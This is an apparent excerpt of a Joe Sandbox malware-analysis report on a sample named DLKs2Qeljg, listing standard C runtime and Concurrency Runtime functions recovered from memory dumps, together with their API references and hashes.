                                                                                                        • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 004152F5
                                                                                                        • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00415302
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
                                                                                                        • String ID:
                                                                                                        • API String ID: 64082781-0
                                                                                                        • Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                                                                        • Instruction ID: 92d1c34fbceb37c5e5f9077c7c8fc552543b368c3c2b1ba0295726bf9b0ea822
                                                                                                        • Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                                                                        • Instruction Fuzzy Hash: 44618E71900715EFDB18CFA5E8D26EEB7A1FB84316F24807ED44597242C739A981CF48
                                                                                                        APIs
                                                                                                        • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 021354A0
                                                                                                          • Part of subcall function 02134EB1: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 02134EC5
                                                                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 021354C9
                                                                                                          • Part of subcall function 0213332B: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02133347
                                                                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 021354F0
                                                                                                        • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 021353AA
                                                                                                          • Part of subcall function 0213338F: __EH_prolog3_GS.LIBCMT ref: 02133396
                                                                                                          • Part of subcall function 0213338F: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 021333A5
                                                                                                          • Part of subcall function 0213338F: GetProcessAffinityMask.KERNEL32(00000000), ref: 021333AC
                                                                                                          • Part of subcall function 0213338F: GetCurrentThread.KERNEL32 ref: 021333D4
                                                                                                          • Part of subcall function 0213338F: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 021333DE
                                                                                                        • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 021353CB
                                                                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02135402
                                                                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02135445
                                                                                                        • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 02135538
                                                                                                        • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 0213555C
                                                                                                        • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 02135569
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
                                                                                                        • String ID:
                                                                                                        • API String ID: 64082781-0
                                                                                                        • Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                                                                        • Instruction ID: 67f181ba771cb544f7e1692b23fcb54fee30acac3b363b7206ef49eb185d33de
                                                                                                        • Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                                                                        • Instruction Fuzzy Hash: 39619A71A84311AFDB1ACF64E8D166DB7B3FB48726F64807DC446A7252D734A940CF88
                                                                                                        APIs
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02140C26
                                                                                                        • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 02140C8D
                                                                                                        • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 02140CAA
                                                                                                        • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 02140D10
                                                                                                        • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 02140D25
                                                                                                        • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 02140D37
                                                                                                        • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 02140D65
                                                                                                        • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 02140D70
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02140D9C
                                                                                                        • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 02140DAC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3720063390-0
                                                                                                        • Opcode ID: 5c88d6c2783884595e80d68d3e5870dbc5133051b1680621d86c5f4de34e2022
                                                                                                        • Instruction ID: 8a02529ce3a43b47c2bfa8d9650f3196286a1da62fed6ee46dbc05cac2298469
                                                                                                        • Opcode Fuzzy Hash: 5c88d6c2783884595e80d68d3e5870dbc5133051b1680621d86c5f4de34e2022
                                                                                                        • Instruction Fuzzy Hash: 0A41C230A842589FCF19FFA5C4507ED77A36F09304F0440A9DA4E6B282DF765A49CF65
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00431DEA
                                                                                                          • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                          • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                        • _free.LIBCMT ref: 00431DF6
                                                                                                        • _free.LIBCMT ref: 00431E01
                                                                                                        • _free.LIBCMT ref: 00431E0C
                                                                                                        • _free.LIBCMT ref: 00431E17
                                                                                                        • _free.LIBCMT ref: 00431E22
                                                                                                        • _free.LIBCMT ref: 00431E2D
                                                                                                        • _free.LIBCMT ref: 00431E38
                                                                                                        • _free.LIBCMT ref: 00431E43
                                                                                                        • _free.LIBCMT ref: 00431E51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                        • Instruction ID: 87776794b7e7eece0f25d73b1b75ae69850b50dc626e3fc0762df5fa29964573
                                                                                                        • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                        • Instruction Fuzzy Hash: 9011A776500108BFDB02EF55C852CD93B65EF18356F0190AAF9184B232DA35DF519F88
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 02152051
                                                                                                          • Part of subcall function 021536C1: HeapFree.KERNEL32(00000000,00000000,?,0215A34F,?,00000000,?,00000000,?,0215A5F3,?,00000007,?,?,0215A9E7,?), ref: 021536D7
                                                                                                          • Part of subcall function 021536C1: GetLastError.KERNEL32(?,?,0215A34F,?,00000000,?,00000000,?,0215A5F3,?,00000007,?,?,0215A9E7,?,?), ref: 021536E9
                                                                                                        • _free.LIBCMT ref: 0215205D
                                                                                                        • _free.LIBCMT ref: 02152068
                                                                                                        • _free.LIBCMT ref: 02152073
                                                                                                        • _free.LIBCMT ref: 0215207E
                                                                                                        • _free.LIBCMT ref: 02152089
                                                                                                        • _free.LIBCMT ref: 02152094
                                                                                                        • _free.LIBCMT ref: 0215209F
                                                                                                        • _free.LIBCMT ref: 021520AA
                                                                                                        • _free.LIBCMT ref: 021520B8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                        • Instruction ID: 46f2ec78e3d67e75b2c37cae549809a1d00225fb402bf23249099e4c3fd9c301
                                                                                                        • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                        • Instruction Fuzzy Hash: F6113F76950118EFCB01EF94C941D993FA6EF04390B5185E9BE298B271DB31EA609F80
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __cftoe
                                                                                                        • String ID: <(@$<(@
                                                                                                        • API String ID: 4189289331-1745028333
                                                                                                        • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                        • Instruction ID: dd19a4b5401c40ac365bd4b6466f4abdac11a3aecfb9adebaa38ddcec4c103bf
                                                                                                        • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                        • Instruction Fuzzy Hash: 18512C32A00111EBDB149B5BEC41EAB77ADEF49325F90415FF81592282DB39D900866D
                                                                                                        APIs
                                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044017F), ref: 0043EEB5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DecodePointer
                                                                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                        • API String ID: 3527080286-3064271455
                                                                                                        • Opcode ID: d21bb7d67464a32b5cb6785f7c0f44f77b7a5dc18ca1c6f51477ac7f13519174
                                                                                                        • Instruction ID: 29b0adf4cd4a19bf6d80e559d7e92663f8e6ec8767138eee3bf00a563bc4ae44
                                                                                                        • Opcode Fuzzy Hash: d21bb7d67464a32b5cb6785f7c0f44f77b7a5dc18ca1c6f51477ac7f13519174
                                                                                                        • Instruction Fuzzy Hash: 4851A07090150ADBCF14DFA9E9481AEBBB0FB0D300F2551A7D480A62A5C7B99D29CB1E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                        • Instruction ID: 6fae12c99c194b36a1472febc75e0a6632027fd34237e6f6979724e0403aa68e
                                                                                                        • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                        • Instruction Fuzzy Hash: B6C1D070E84359EFDB16DFA8C844BAEBBB1AF09354F0440D9E835AB392C7319941CB61
                                                                                                        APIs
                                                                                                        • atomic_compare_exchange.LIBCONCRT ref: 0213C6CC
                                                                                                        • atomic_compare_exchange.LIBCONCRT ref: 0213C6F0
                                                                                                        • std::_Cnd_initX.LIBCPMT ref: 0213C701
                                                                                                        • std::_Cnd_initX.LIBCPMT ref: 0213C70F
                                                                                                          • Part of subcall function 02121370: __Mtx_unlock.LIBCPMT ref: 02121377
                                                                                                        • std::_Cnd_initX.LIBCPMT ref: 0213C71F
                                                                                                          • Part of subcall function 0213C3DF: __Cnd_broadcast.LIBCPMT ref: 0213C3E6
                                                                                                        • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0213C72D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                                                        • String ID: d#D
                                                                                                        • API String ID: 4258476935-2139572230
                                                                                                        • Opcode ID: 5abf2091e9ef3c120a03ce8f27c2dce0f0e4d4679916a690eb1c806f1cbcb468
                                                                                                        • Instruction ID: 4b3d20dc2be39c9f45aea84588082f8d140c9e146c845a3fe84b0b56fe58bfe0
                                                                                                        • Opcode Fuzzy Hash: 5abf2091e9ef3c120a03ce8f27c2dce0f0e4d4679916a690eb1c806f1cbcb468
                                                                                                        • Instruction Fuzzy Hash: 8001A7759816056FDB22F7608D48B9E735BBF04350F140011E90557680EBB4EB158ED1
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D928,0042D928,?,?,?,00432375,00000001,00000001,23E85006), ref: 0043217E
                                                                                                        • __alloca_probe_16.LIBCMT ref: 004321B6
                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432375,00000001,00000001,23E85006,?,?,?), ref: 00432204
                                                                                                        • __alloca_probe_16.LIBCMT ref: 0043229B
                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004322FE
                                                                                                        • __freea.LIBCMT ref: 0043230B
                                                                                                          • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                        • __freea.LIBCMT ref: 00432314
                                                                                                        • __freea.LIBCMT ref: 00432339
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3864826663-0
                                                                                                        • Opcode ID: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
                                                                                                        • Instruction ID: ba832ad7ebe863b589d8a86c2aeb799e0d63014e0688505fe86a97fbdbb1aa79
                                                                                                        • Opcode Fuzzy Hash: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
                                                                                                        • Instruction Fuzzy Hash: DA51F572600216AFDB249F71DD41EAF77A9EB48754F14462AFD04E7240DBBCDC408668
                                                                                                        APIs
                                                                                                          • Part of subcall function 02152131: GetLastError.KERNEL32(?,?,0214A9DC,?,00000000,?,0214CDD6,02122474,00000000,?,00451F20), ref: 02152135
                                                                                                          • Part of subcall function 02152131: _free.LIBCMT ref: 02152168
                                                                                                          • Part of subcall function 02152131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521A9
                                                                                                        • _free.LIBCMT ref: 02151434
                                                                                                        • _free.LIBCMT ref: 0215144D
                                                                                                        • _free.LIBCMT ref: 0215147F
                                                                                                        • _free.LIBCMT ref: 02151488
                                                                                                        • _free.LIBCMT ref: 02151494
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorLast
                                                                                                        • String ID: C
                                                                                                        • API String ID: 3291180501-1037565863
                                                                                                        • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                        • Instruction ID: 4ab251608f9e20d6a061b6974a833a0adb2e2afa7d93e8a4cc377b7f254ce0ec
                                                                                                        • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                        • Instruction Fuzzy Hash: 4BB10575A41229EFDB25DF28C894BADB7B5FB08314F1045EAD929A7350D770AE90CF80
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                        • Instruction ID: 375e79c53d3bcaca8bdb11d34ea16f93cbcffeb35ab56cd023e7f34feda17694
                                                                                                        • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                        • Instruction Fuzzy Hash: 2361F271D00205AFEB20DF69C842B9ABBF4EF0D710F14516BE888EB382E7759D418B59
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                        • Instruction ID: 5612cfec1880d3a9e7ab97f568f855f4c05c39d68de4ac801caac46de2c922ff
                                                                                                        • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                        • Instruction Fuzzy Hash: DC619171D80225EFDB20DF68C842B9ABBF5EF05720F2442EAED64EB251D7719941CB90
                                                                                                        APIs
                                                                                                        • GetConsoleCP.KERNEL32(?,0042C22D,E0830C40,?,?,?,?,?,?,00433FE8,0040DDCB,0042C22D,?,0042C22D,0042C22D,0040DDCB), ref: 004338B5
                                                                                                        • __fassign.LIBCMT ref: 00433930
                                                                                                        • __fassign.LIBCMT ref: 0043394B
                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,0042C22D,00000001,?,00000005,00000000,00000000), ref: 00433971
                                                                                                        • WriteFile.KERNEL32(?,?,00000000,00433FE8,00000000,?,?,?,?,?,?,?,?,?,00433FE8,0040DDCB), ref: 00433990
                                                                                                        • WriteFile.KERNEL32(?,0040DDCB,00000001,00433FE8,00000000,?,?,?,?,?,?,?,?,?,00433FE8,0040DDCB), ref: 004339C9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 1324828854-0
                                                                                                        • Opcode ID: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
                                                                                                        • Instruction ID: 0fd517cfdcf2aa173ba8fdea846c20396cfd97c89b6f08fd2475e7b61059f896
                                                                                                        • Opcode Fuzzy Hash: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
                                                                                                        • Instruction Fuzzy Hash: 7751C470E002099FCB20DFA8D845BEEBBF4EF09701F14412BE556E7291E774AA41CB69
                                                                                                        APIs
                                                                                                        • GetConsoleCP.KERNEL32(?,0214C494,E0830C40,?,?,?,?,?,?,0215424F,0212E032,0214C494,?,0214C494,0214C494,0212E032), ref: 02153B1C
                                                                                                        • __fassign.LIBCMT ref: 02153B97
                                                                                                        • __fassign.LIBCMT ref: 02153BB2
                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,0214C494,00000001,?,00000005,00000000,00000000), ref: 02153BD8
                                                                                                        • WriteFile.KERNEL32(?,?,00000000,0215424F,00000000,?,?,?,?,?,?,?,?,?,0215424F,0212E032), ref: 02153BF7
                                                                                                        • WriteFile.KERNEL32(?,0212E032,00000001,0215424F,00000000,?,?,?,?,?,?,?,?,?,0215424F,0212E032), ref: 02153C30
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 1324828854-0
                                                                                                        • Opcode ID: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
                                                                                                        • Instruction ID: f4119d84b3f57c070173132dc176683639c38b2ebbe9960887418328f366adfc
                                                                                                        • Opcode Fuzzy Hash: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
                                                                                                        • Instruction Fuzzy Hash: 3151C374900219EFCB10CFA8D884BEEBBF5EF09701F1441AAE965E7391D730A981CB60
                                                                                                        APIs
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 004286EB
                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 004286F3
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00428781
                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 004287AC
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00428801
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                        • String ID: csm
                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                        • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                        • Instruction ID: 6873744b8b7164bb1b3b36c6b2f168add7434ae9e481f0ca892fbce792e2aca1
                                                                                                        • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                        • Instruction Fuzzy Hash: 8C411934B012289BCF10DF29DC45A9F7BB0AF80328F64815FE8145B392DB399D15CB99
                                                                                                        APIs
                                                                                                        • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02144ABD
                                                                                                          • Part of subcall function 02144D8C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,021447F0), ref: 02144D9C
                                                                                                        • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02144AD2
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02144AE1
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02144AEF
                                                                                                        • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 02144B65
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02144BA5
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02144BB3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3151764488-0
                                                                                                        • Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                        • Instruction ID: 66419b0897c69b7d5aba5b60d4d7b16356dee38b9ffd46da70c90cab8d16934c
                                                                                                        • Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                        • Instruction Fuzzy Hash: 0831F735A402149FCF19EF68C880B6DB3BAFF44314F25456AE919A7281DF70EE05DB94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                        • Instruction ID: 6d10875eadbb656c302b38412db81507454656e5ad58498e79d080ea23809695
                                                                                                        • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                        • Instruction Fuzzy Hash: 54110D72A04215BFDB202FB79C05F6B7A5CEF89725F20163BF815C7241DA38890587A9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                        • Instruction ID: 3151f9a1768df059d77b0652735c160b62d66be1d3deecbe2ed02aa8bf441f3f
                                                                                                        • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                        • Instruction Fuzzy Hash: 2E11D232584128FFDB242F769C08D6B3AADEF82731B1106A4FC39C7250DF318901CAA0
                                                                                                        APIs
                                                                                                          • Part of subcall function 0043A0BA: _free.LIBCMT ref: 0043A0E3
                                                                                                        • _free.LIBCMT ref: 0043A3C1
                                                                                                          • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                          • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
